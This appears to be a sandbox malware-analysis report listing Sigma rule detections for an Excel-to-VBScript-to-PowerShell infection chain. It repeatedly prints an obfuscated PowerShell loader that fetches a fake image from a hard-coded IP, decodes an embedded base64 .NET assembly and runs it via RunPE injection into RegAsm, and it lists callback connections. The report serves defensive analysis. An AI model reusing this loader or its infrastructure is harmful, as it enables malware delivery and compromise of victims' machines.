YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8.G'+'et'+'St'+'ring(YRCdownloadedData)'+';

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49173, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2544, Protocol: tcp, SourceIp: 172.232.56.138, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8.G'+'et'+'St'+'ring(YRCdownloadedData)'+';

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8.G'+'et'+'St'+'ring(YRCdownloadedData)'+';

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 216.9.224.18, DestinationIsIpv6: false, DestinationPort: 9943, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 3332, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49177

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 91.92.254.14, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3136, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49174

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1892, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS" , ProcessId: 3136, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1892, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS" , ProcessId: 3136, ProcessName: wscript.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 104.21.11.106, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1892, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 91.92.254.14, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3136, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49174

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1892, Protocol: tcp, SourceIp: 104.21.11.106, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8.G'+'et'+'St'+'ring(YRCdownloadedData)'+';

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8.G'+'et'+'St'+'ring(YRCdownloadedData)'+';

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1892, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS" , ProcessId: 3136, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1892, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8.G'+'et'+'St'+'ring(YRCdownloadedData)'+';

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3196, TargetFilename: C:\Users\user\AppData\Local\Temp\lg0obywh.f2c.ps1

Data Obfuscation

Sigma detected: Powershell Download and Execute IEX

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = 